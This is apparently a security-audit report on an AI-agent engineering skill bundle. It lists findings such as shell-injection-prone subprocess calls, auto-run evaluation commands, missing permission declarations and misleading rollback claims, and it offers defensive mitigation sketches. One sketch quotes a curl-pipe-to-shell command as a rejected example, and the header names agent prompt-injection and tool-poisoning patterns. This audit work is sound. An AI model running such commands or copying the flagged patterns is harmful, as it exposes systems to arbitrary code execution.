Security audit

agiza_agents

Security checks across malware telemetry and agentic risk

Overview

This appears to be a real engineering skill bundle, but it grants agents broad command execution, autonomous code mutation, and local testing authority with some under-disclosed risks.

Install only if you are comfortable reviewing and controlling a powerful engineering automation bundle. Run it in disposable or sandboxed repositories, avoid exposing secrets or production credentials, review every eval/build/test command before execution, do not run the skill-tester against untrusted skills on your normal host, and treat generated database migrations as drafts requiring expert review before production use.

SkillSpector

By NVIDIA

Vulnerability Patterns

Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
Behavioral AST: exec() Call, eval() Call, Dynamic Import
MCP Least Privilege: Underdeclared Capability, Wildcard Permission, Missing Permission Declaration
MCP Tool Poisoning: Hidden Instructions, Unicode Deception, Parameter Description Injection
Prompt Injection: Instruction Override, Hidden Instructions, Exfiltration Commands

Findings (84)

subprocess module call

Medium

Category: Dangerous Code Execution
Content: def run_eval_in_worktree(worktree_path, eval_cmd): """Run evaluation command in a worktree and return stdout.""" try: result = subprocess.run( eval_cmd, shell=True, capture_output=True, text=True, cwd=worktree_path, timeout=120 )
Confidence: 99%
Finding: result = subprocess.run( eval_cmd, shell=True, capture_output=True, text=True, cwd=worktree_path, timeout=120 )
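One possible mitigation for this finding, as a minimal sketch rather than the bundle's actual code: tokenize the command with shlex.split and pass the resulting argument list to subprocess.run without shell=True. The function name and the 120-second timeout mirror the flagged snippet; the empty-command check is an added assumption, and the sketch assumes POSIX-style quoting.

```python
import shlex
import subprocess


def run_eval_in_worktree(worktree_path, eval_cmd, timeout=120):
    """Run an evaluation command without a shell and return its stdout."""
    # shlex.split tokenizes the string with POSIX shell quoting rules, but no
    # shell ever sees it, so ';', '&&', and '$(...)' stay literal arguments.
    argv = shlex.split(eval_cmd)
    if not argv:
        raise ValueError("eval_cmd is empty")
    result = subprocess.run(
        argv,
        capture_output=True,
        text=True,
        cwd=worktree_path,
        timeout=timeout,
    )
    return result.stdout
```

Commands that rely on pipes or redirection stop working under this approach, which is the intended trade-off: such pipelines would need to be expressed explicitly in Python.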

subprocess module call

Medium

Category: Dangerous Code Execution
Content: # Build if needed if "BUILD_CMD" in dir() or "BUILD_CMD" in globals(): result = subprocess.run(BUILD_CMD, shell=True, capture_output=True) if result.returncode != 0: print(f"Build failed: {result.stderr.decode()[:200]}", file=sys.stderr) sys.exit(1)
Confidence: 97%
Finding: result = subprocess.run(BUILD_CMD, shell=True, capture_output=True)

subprocess module call

Medium

Category: Dangerous Code Execution
Content: if "DOCKER_IMAGE" in dir() or "DOCKER_IMAGE" in globals(): if "DOCKER_BUILD_CMD" in dir(): subprocess.run(DOCKER_BUILD_CMD, shell=True, capture_output=True) result = subprocess.run( f"docker image inspect {DOCKER_IMAGE} --format '{{{{.Size}}}}'", shell=True, capture_output=True, text=True )
Confidence: 96%
Finding: result = subprocess.run( f"docker image inspect {DOCKER_IMAGE} --format '{{{{.Size}}}}'", shell=True, capture_output=True, text=True )
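The interpolated DOCKER_IMAGE value is the risky part of this call. A hedged sketch of one alternative follows: validate the image reference and build an argument list, so the value can never be parsed as shell syntax or as an extra option. The helper names and the allow-list pattern are assumptions made for illustration; real image references can be more varied.

```python
import re
import subprocess

# Assumed allow-list for illustration only. It rejects whitespace, shell
# metacharacters, and a leading '-' that docker could read as an option.
_IMAGE_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._/:@-]*")


def inspect_size_argv(image):
    """Build the argv for `docker image inspect` without any shell parsing."""
    if not _IMAGE_RE.fullmatch(image):
        raise ValueError(f"refusing suspicious image reference: {image!r}")
    return ["docker", "image", "inspect", image, "--format", "{{.Size}}"]


def image_size_bytes(image):
    """Return the image size in bytes as reported by docker."""
    result = subprocess.run(
        inspect_size_argv(image), capture_output=True, text=True, timeout=60
    )
    result.check_returncode()
    return int(result.stdout.strip())
```

Because no f-string passes through a shell, the Go template no longer needs the quadruple-brace escaping seen in the flagged code.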

subprocess module call

Medium

Category: Dangerous Code Execution
Content: # Measure if "DOCKER_IMAGE" in dir() or "DOCKER_IMAGE" in globals(): if "DOCKER_BUILD_CMD" in dir(): subprocess.run(DOCKER_BUILD_CMD, shell=True, capture_output=True) result = subprocess.run( f"docker image inspect {DOCKER_IMAGE} --format '{{{{.Size}}}}'", shell=True, capture_output=True, text=True
Confidence: 96%
Finding: subprocess.run(DOCKER_BUILD_CMD, shell=True, capture_output=True)

subprocess module call

Medium

Category: Dangerous Code Execution
Content: subprocess.run(CLEAN_CMD, shell=True, capture_output=True, timeout=60) t0 = time.perf_counter() result = subprocess.run(BUILD_CMD, shell=True, capture_output=True, timeout=600) elapsed = time.perf_counter() - t0 if result.returncode != 0:
Confidence: 96%
Finding: result = subprocess.run(BUILD_CMD, shell=True, capture_output=True, timeout=600)

subprocess module call

Medium

Category: Dangerous Code Execution
Content: for i in range(RUNS): # Clean if configured if CLEAN_CMD: subprocess.run(CLEAN_CMD, shell=True, capture_output=True, timeout=60) t0 = time.perf_counter() result = subprocess.run(BUILD_CMD, shell=True, capture_output=True, timeout=600)
Confidence: 95%
Finding: subprocess.run(CLEAN_CMD, shell=True, capture_output=True, timeout=60)

subprocess module call

Medium

Category: Dangerous Code Execution
Content: if system == "Linux": # Use /usr/bin/time for peak RSS result = subprocess.run( f"/usr/bin/time -v {COMMAND}", shell=True, capture_output=True, text=True, timeout=300 )
Confidence: 95%
Finding: result = subprocess.run( f"/usr/bin/time -v {COMMAND}", shell=True, capture_output=True, text=True, timeout=300 )

subprocess module call

Medium

Category: Dangerous Code Execution
Content: elif system == "Darwin": # macOS: use /usr/bin/time -l result = subprocess.run( f"/usr/bin/time -l {COMMAND}", shell=True, capture_output=True, text=True, timeout=300 )
Confidence: 95%
Finding: result = subprocess.run( f"/usr/bin/time -l {COMMAND}", shell=True, capture_output=True, text=True, timeout=300 )
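The Linux and macOS branches differ only in the flag passed to /usr/bin/time (-v and -l respectively, as in the flagged code). A small sketch, assuming a hypothetical helper named timed_argv, shows how both could share one argument-list builder instead of two shell strings:

```python
import platform
import shlex

# Flags taken from the flagged snippets: GNU time uses -v, BSD/macOS time uses -l.
_TIME_FLAGS = {"Linux": "-v", "Darwin": "-l"}


def timed_argv(command, system=None):
    """Return an argv that wraps `command` in /usr/bin/time for this platform."""
    system = system or platform.system()
    flag = _TIME_FLAGS.get(system)
    if flag is None:
        raise NotImplementedError(f"no /usr/bin/time flag known for {system!r}")
    inner = shlex.split(command)
    if not inner:
        raise ValueError("command is empty")
    return ["/usr/bin/time", flag, *inner]
```

The returned list can be passed to subprocess.run directly, with shell=True omitted.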

subprocess module call

Medium

Category: Dangerous Code Execution
Content: TEST_CMD = "pytest tests/ --tb=no -q" # Test command # --- END CONFIG --- result = subprocess.run(TEST_CMD, shell=True, capture_output=True, text=True, timeout=300) output = result.stdout + "\n" + result.stderr # Try to parse pytest output: "X passed, Y failed, Z errors"
Confidence: 97%
Finding: result = subprocess.run(TEST_CMD, shell=True, capture_output=True, text=True, timeout=300)

subprocess module call

Medium

Category: Dangerous Code Execution
Content: t0 = time.time() try: with open(log_file, "w") as lf: result = subprocess.run( eval_cmd, shell=True, stdout=lf, stderr=subprocess.STDOUT, cwd=str(project_root),
Confidence: 98%
Finding: result = subprocess.run( eval_cmd, shell=True, stdout=lf, stderr=subprocess.STDOUT, cwd=str(project_root), timeout=hard_limi

subprocess module call

Medium

Category: Dangerous Code Execution
Content: def run_cmd(cmd, cwd=None, timeout=None): """Run shell command, return (returncode, stdout, stderr).""" result = subprocess.run( cmd, shell=True, capture_output=True, text=True, cwd=cwd, timeout=timeout )
Confidence: 98%
Finding: result = subprocess.run( cmd, shell=True, capture_output=True, text=True, cwd=cwd, timeout=timeout )

subprocess module call

Medium

Category: Dangerous Code Execution
Content: try: # Try to run the script with no arguments (should not crash immediately) process = subprocess.run( [sys.executable, str(script_path)], capture_output=True, text=True,
Confidence: 96%
Finding: process = subprocess.run( [sys.executable, str(script_path)], capture_output=True, text=True, timeout=self.timeout,

subprocess module call

Medium

Category: Dangerous Code Execution
Content: try: # Test --help flag process = subprocess.run( [sys.executable, str(script_path), '--help'], capture_output=True, text=True,
Confidence: 95%
Finding: process = subprocess.run( [sys.executable, str(script_path), '--help'], capture_output=True, text=True, timeout=self.timeout

subprocess module call

Medium

Category: Dangerous Code Execution
Content: self.log_verbose(f"Testing with sample file: {sample_file.name}") # Try to run script with the sample file as input process = subprocess.run( [sys.executable, str(script_path), str(sample_file)], capture_output=True, text=True,
Confidence: 98%
Finding: process = subprocess.run( [sys.executable, str(script_path), str(sample_file)], capture_output=True, text=True,

subprocess module call

Medium

Category: Dangerous Code Execution
Content: # Try running with --json flag if it looks like it supports it if '--json' in content: try: process = subprocess.run( [sys.executable, str(script_path), '--json', '--help'], capture_output=True, text=True,
Confidence: 93%
Finding: process = subprocess.run( [sys.executable, str(script_path), '--json', '--help'], capture_output=True, text=

Lp3

Medium

Category: MCP Least Privilege
Confidence: 83%
Finding: The skill advertises and instructs use of components that imply powerful capabilities such as file access, shell usage, network access, and MCP integration, but it does not declare any permissions or capability boundaries in the manifest. This creates a trust and review gap: downstream agents or users may invoke high-risk subskills without clear authorization expectations, increasing the chance of overprivileged execution or unsafe tool use.

Intent-Code Divergence

Medium

Confidence: 92%
Finding: The skill gives broad instructions to read config, strategy, results, and git history, then later states the agent must never read or modify files outside the target file and program.md. This contradiction weakens safety boundaries because an autonomous agent may follow the earlier broader instructions and access more repository data than the constraint appears to permit, leading to unintended data exposure or policy bypass.

Context-Inappropriate Capability

Medium

Confidence: 97%
Finding: The setup process executes an arbitrary user-supplied evaluation command during initialization. Because this occurs automatically as part of setup, a malicious or mistaken command can run code, alter files, access secrets available to the user, or perform network actions before the experiment even starts.
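A review gate in front of the setup step is one way to address this. The sketch below is illustrative only: approved_argv and its approve callback are hypothetical names, and the callback could be an interactive prompt, an allow-list lookup, or a policy check.

```python
import shlex


def approved_argv(eval_cmd, approve):
    """Return the tokenized command only if the reviewer callback accepts it."""
    argv = shlex.split(eval_cmd)
    if not argv:
        raise ValueError("eval_cmd is empty")
    # `approve` is a hypothetical callback supplied by the caller; it receives
    # the exact argv that would be executed and returns True or False.
    if not approve(argv):
        raise PermissionError(f"eval command not approved: {argv!r}")
    return argv
```

For example, approved_argv("pytest -q", lambda argv: argv[0] == "pytest") returns the argument list, while a command such as "curl http://example.invalid | sh" is rejected by the same callback before anything runs.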

Intent-Code Divergence

Medium

Confidence: 97%
Finding: The file-level documentation promises rollback scripts for all changes, but the implementation does not provide a real rollback for dropped tables. This mismatch is security-relevant because operators may trust the generated plan during production schema changes and discover too late that destructive steps are not recoverable, increasing risk of irreversible data loss during incidents or failed deployments.

Intent-Code Divergence

High

Confidence: 98%
Finding: The zero-downtime claim is contradicted by the generated workflow for column modifications, which performs UPDATE of the full table, DROP COLUMN, and RENAME COLUMN operations directly. In real deployments these actions can lock large tables, break running application versions, and cause outages while the tool labels the strategy as zero-downtime, creating dangerous operator overconfidence.
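For contrast, a commonly used alternative is the expand/contract pattern: add a new column, backfill it in small batches, switch the application over, and only then drop the old column. The sketch below is not the tool's generator. The function name, the phase labels, the :start bind parameter, and the PostgreSQL-style SQL are all assumptions, and even these steps take brief locks, so it reduces risk rather than guaranteeing zero downtime.

```python
import re

_IDENT = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")
_TYPE = re.compile(r"[A-Za-z][A-Za-z0-9_ ]*(\(\d+(,\s*\d+)?\))?")


def _ident(name):
    # Reject anything that is not a plain SQL identifier before interpolating.
    if not _IDENT.fullmatch(name):
        raise ValueError(f"unsafe identifier: {name!r}")
    return name


def expand_contract_plan(table, column, new_column, new_type, pk="id", batch=1000):
    """Return (phase, statement) pairs for a batched column type change."""
    t, c, n, k = (_ident(x) for x in (table, column, new_column, pk))
    if not _TYPE.fullmatch(new_type):
        raise ValueError(f"unsafe type: {new_type!r}")
    size = int(batch)
    return [
        ("expand", f"ALTER TABLE {t} ADD COLUMN {n} {new_type};"),
        # Run repeatedly with an advancing :start so no single UPDATE
        # touches the whole table.
        ("backfill",
         f"UPDATE {t} SET {n} = CAST({c} AS {new_type}) "
         f"WHERE {k} >= :start AND {k} < :start + {size} AND {n} IS NULL;"),
        ("switch", "-- deploy application code that reads and writes the new column"),
        ("contract", f"ALTER TABLE {t} DROP COLUMN {c};"),
    ]
```

The plan deliberately contains no RENAME COLUMN step, since renaming in place is one of the operations the finding identifies as breaking running application versions.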

Intent-Code Divergence

Medium

Confidence: 99%
Finding: The drop-table rollback path returns only a placeholder comment instead of executable recovery SQL, despite surrounding claims that rollback support exists. This makes destructive migrations materially unsafe because a failed or mistaken deployment can leave operators without an actual recovery path after the table is removed.
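A safer default than a placeholder comment is to fail loudly when no recovery path exists. The following sketch assumes a hypothetical convention in which the forward migration renames the table to a backup name instead of dropping it; the exception class, the function name, and that convention are illustrative and not taken from the audited tool.

```python
import re

_IDENT = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")


class IrreversibleMigrationError(Exception):
    """Raised when a rollback cannot actually restore the dropped data."""


def rollback_for_drop_table(table, backup_table=None):
    """Return executable rollback SQL, or raise if the drop is unrecoverable."""
    for name in (table, backup_table):
        if name is not None and not _IDENT.fullmatch(name):
            raise ValueError(f"unsafe identifier: {name!r}")
    if backup_table is None:
        # No backup was kept, so an honest generator cannot emit a rollback.
        raise IrreversibleMigrationError(
            f"DROP TABLE {table} has no rollback; restore from a database backup"
        )
    # Assumes the forward step renamed the table to backup_table rather than
    # dropping it, so the rollback is a simple rename back.
    return f"ALTER TABLE {backup_table} RENAME TO {table};"
```

Raising an error forces the operator to acknowledge the irreversible step during planning instead of discovering it during an incident.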

Context-Inappropriate Capability

Medium

Confidence: 98%
Finding: The sample dataset includes protected demographic attributes such as gender and ethnicity, along with pedigree-like fields such as university tier, in interview records for a hiring-related skill. Even as sample data, this normalizes collection and downstream use of sensitive attributes in evaluation pipelines, increasing the risk of discriminatory decision-making, biased model behavior, or accidental use in ranking and recommendations.

Intent-Code Divergence

Medium

Confidence: 92%
Finding: The documentation presents conflicting safety guarantees: it states that testing is 'sandboxed' and 'static analysis only', yet elsewhere describes runtime execution of target scripts. For a tool that validates untrusted skills, this can cause operators to underestimate execution risk and run the tester in insufficiently isolated environments, increasing the chance of arbitrary code execution during validation.
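To illustrate what a check that really is "static analysis only" could look like, here is a minimal sketch using Python's ast module. It parses the target source and reports risky calls without importing or executing it. The function name and the set of flagged names are assumptions, and the check is intentionally shallow: aliased imports or getattr tricks would evade it.

```python
import ast

# Assumed set of builtins worth flagging; extend as needed.
RISKY_BUILTINS = {"exec", "eval", "__import__"}


def find_risky_calls(source):
    """Return sorted (line, name) pairs for risky calls found in `source`."""
    findings = []
    # ast.parse only builds a syntax tree; the target code is never run.
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        if isinstance(func, ast.Name) and func.id in RISKY_BUILTINS:
            findings.append((node.lineno, func.id))
        elif (
            isinstance(func, ast.Attribute)
            and isinstance(func.value, ast.Name)
            and func.value.id == "subprocess"
        ):
            findings.append((node.lineno, f"subprocess.{func.attr}"))
    return sorted(findings)
```

Any step that goes further and launches the target script, as the flagged subprocess.run calls do, is dynamic testing and should be documented and isolated as such.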

Intent-Code Divergence

Medium

Confidence: 94%
Finding: The file presents itself as a training example of bad patterns, but it still contains live HTTP calls to real Stripe, Square, and PayPal endpoints. In a sample-code or demo context, this mismatch is dangerous because a developer may run it assuming it is inert, causing unintended transmission of payment data or accidental interaction with production payment infrastructure.

Intent-Code Divergence

Medium

Confidence: 97%
Finding: The refund function explicitly states it does not process refunds, yet it returns success and "Refund initiated." This can create security and integrity issues in payment operations: downstream systems or operators may believe funds were returned when they were not, leading to customer harm, reconciliation failures, and abuse opportunities.
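A stub that does not process refunds should say so in its return value. The sketch below is a hypothetical replacement; the function signature and the field names are assumptions, not the audited file's API.

```python
def refund(payment_id, amount_cents):
    """Report honestly that no refund was processed by this stub."""
    if amount_cents <= 0:
        raise ValueError("amount_cents must be positive")
    return {
        # success is False because no payment provider was contacted.
        "success": False,
        "status": "not_processed",
        "payment_id": payment_id,
        "amount_cents": amount_cents,
        "message": "Refund not processed: no payment provider call is implemented.",
    }
```

Downstream reconciliation can then treat "not_processed" as an open item rather than recording a refund that never happened.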

VirusTotal

66/66 vendors flagged this skill as clean.
